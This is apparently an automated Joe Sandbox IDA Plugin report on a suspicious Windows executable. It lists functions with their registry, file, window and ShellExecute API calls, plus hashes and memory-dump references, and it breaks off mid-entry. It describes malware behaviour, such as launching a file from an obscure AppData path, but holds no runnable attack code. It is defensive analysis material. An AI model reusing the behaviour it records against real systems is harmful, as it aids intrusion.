Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: 5e382bfa05fba0e443e79618048df14a3cf1dcf141c637452d2eeebb68c738d2
Instruction ID: 9699cf0a6c97e1698ecba8eb95fa3f921ed053e19654e9fc7eefe6a52c881a96
Opcode Fuzzy Hash: 5e382bfa05fba0e443e79618048df14a3cf1dcf141c637452d2eeebb68c738d2
Instruction Fuzzy Hash: 77015B31904118EBCF10AFA1D9459AE7B71AB00344F10853BF601B51E0C7B849419FAA

Uniqueness

Uniqueness Score: -1.00%

Function 00405A61 Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,00405CA6,00000000,00000002,?,00000002,002AA54D,?,00405CA6,80000002,Software\Microsoft\Windows\CurrentVersion,002AA54D,Exec,00A4C485), ref: 00405A8A
RegQueryValueExA.KERNELBASE(002AA54D,?,00000000,00405CA6,002AA54D,00405CA6), ref: 00405AAB
RegCloseKey.KERNELBASE(?), ref: 00405ACC

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
Instruction ID: c5d279a849dbf4b58f3c41b2e9b5869e935dcf347c73434291752feeb7fa1d0e
Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
Instruction Fuzzy Hash: B401487124020AEFDF128F64EC84AEB3FACEF14354F044526F905A6260D235D964CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040243C Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B09: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?,?,004022CE,00000002), ref: 00402B31

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040246A
RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003,00020019), ref: 0040247D
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nst19C6.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402492

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 0633af6a8d689f42cdea3fe6c05a4e921a0c22368d644d20433ae29f2358fa28
Instruction ID: 9660451cc8f4001ddb67fa76d925c53a41d4691560438eafacefc43ff833bcd5
Opcode Fuzzy Hash: 0633af6a8d689f42cdea3fe6c05a4e921a0c22368d644d20433ae29f2358fa28
Instruction Fuzzy Hash: 1EF0D172904200EFEB11DF649E8DEBF7A6CEB41348F10483EF402B61C0E6B85E41962A

Uniqueness

Uniqueness Score: -1.00%

Function 00401DD8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs,?), ref: 00401E1E

Strings

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs, xrefs: 00401E09

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: ExecuteShell
String ID: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs
API String ID: 587946157-2505418928
Opcode ID: 2591290a0fedf41aad4bbaf15587aa373bd01f26a38f330ec7367add28782182
Instruction ID: 131734184f761090f71c6cb732236e1bdb87e4b45d85496e26b68ac869223774
Opcode Fuzzy Hash: 2591290a0fedf41aad4bbaf15587aa373bd01f26a38f330ec7367add28782182
Instruction Fuzzy Hash: 26F096B3B041006ADB41ABB59D4EE5D7BA4EB41719F140A3AF101F71D6DAFD8842B718

Uniqueness

Uniqueness Score: -1.00%

Function 004023CA Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B09: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?,?,004022CE,00000002), ref: 00402B31

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023FA
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nst19C6.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402492

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: baa3017f4388861bb2d722f797e1763811390100626fa75239236033082411ec
Instruction ID: 7662cb523271307dcb7ca5ba8c2b35af6681fd94d107e397f9814d299b62f766
Opcode Fuzzy Hash: baa3017f4388861bb2d722f797e1763811390100626fa75239236033082411ec
Instruction Fuzzy Hash: 9211A371905215EEDB15DF64DA889AF7BB4EF05348F60843FE442B62C0D2B84A41DB2A

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a305159dcb344ce7468444dd7d46bec5de4f2ab16d0ed776570ab0d658f7d881
Instruction ID: d8ab33b2893eeb752da5ba8574eb8ffac6e67a4653c4243f2171701694b169e5
Opcode Fuzzy Hash: a305159dcb344ce7468444dd7d46bec5de4f2ab16d0ed776570ab0d658f7d881
Instruction Fuzzy Hash: A501FF31A242209BF7194B789C04B6A3698E751368F14C23BF811F66F1EA7CDC028B4D

Uniqueness

Uniqueness Score: -1.00%

Function 004022C2 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B09: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?,?,004022CE,00000002), ref: 00402B31

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004022E1
RegCloseKey.ADVAPI32(00000000), ref: 004022EA

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 107ad47164a1c9ce2c5f79379d6ab0feac024207d54a11953839c19d669ffe40
Instruction ID: 08cb8e98125a8f79caec059c590c17e630d8f9a81ea777e9c37a3f9ee27a84ba
Opcode Fuzzy Hash: 107ad47164a1c9ce2c5f79379d6ab0feac024207d54a11953839c19d669ffe40
Instruction Fuzzy Hash: B0F0C873A001119BDB00BBF48F4EAAE7264AB40318F10453BF101B71C1D9FC4D01A62D

Uniqueness

Uniqueness Score: -1.00%

Function 004019F1 Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A04
lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A17

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: EnvironmentExpandStringslstrcmp
String ID:
API String ID: 1938659011-0
Opcode ID: 8f52b701dc3334d9993fced78b98813908c037aa8644f44ce47356e0d433f95f
Instruction ID: 6f386e2b4611097def1a9d0da8851c9b5811e39dd9fdddc04893b1deeac135d1
Opcode Fuzzy Hash: 8f52b701dc3334d9993fced78b98813908c037aa8644f44ce47356e0d433f95f
Instruction Fuzzy Hash: 4CF0A732F06251DFCB11CF699D44A9B7FE4DF51350B10803BE505F61D0D2788541DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040155B Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00010474), ref: 00401579
ShowWindow.USER32(0001046E), ref: 0040158E

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: c5c99cf099d59cf11b4ba8fa5fcf0e7fbb1ae8de32b1d569b78bd5dbc1b2ae04
Instruction ID: ab354ba23022af6ae99afc3ad479c73f7fb431a583afb052085dc210b64b1d7b
Opcode Fuzzy Hash: c5c99cf099d59cf11b4ba8fa5fcf0e7fbb1ae8de32b1d569b78bd5dbc1b2ae04
Instruction Fuzzy Hash: 36E0E577A082905FDB14CB64AD8086E77E1DB9230075845BFD101E32D1D6799D04CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00401DAC Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
EnableWindow.USER32(00000000,00000000), ref: 00401DCD

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 345e319bbff7daafc09e7fa7245d9068ea599ef8377daeccdabb498d7e5ae18d
Instruction ID: 956114eb2dd735bad5388d6a49995c17c0853b2121f7b666b24c29842559ac1c
Opcode Fuzzy Hash: 345e319bbff7daafc09e7fa7245d9068ea599ef8377daeccdabb498d7e5ae18d
Instruction Fuzzy Hash: 7FE0C272E04120DFDB14FBB4AE8A56E3368DF10359F204437F602F10C1D2B89C41966E

Uniqueness

Uniqueness Score: -1.00%

Function 0040580B Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C6B,C:\Users\user\Desktop\hnTW5HdWvY.exe,80000000,00000003), ref: 0040580F
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405831

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 8e2162a352c9b3d6bf888d6bdf81e716fa6f6f9a74e85dd2386317c2044df056
Instruction ID: 6507fbbaaec62448b9ae143b35cf90270df4f7fb8743d38c88d9b601ce0c16fe
Opcode Fuzzy Hash: 8e2162a352c9b3d6bf888d6bdf81e716fa6f6f9a74e85dd2386317c2044df056
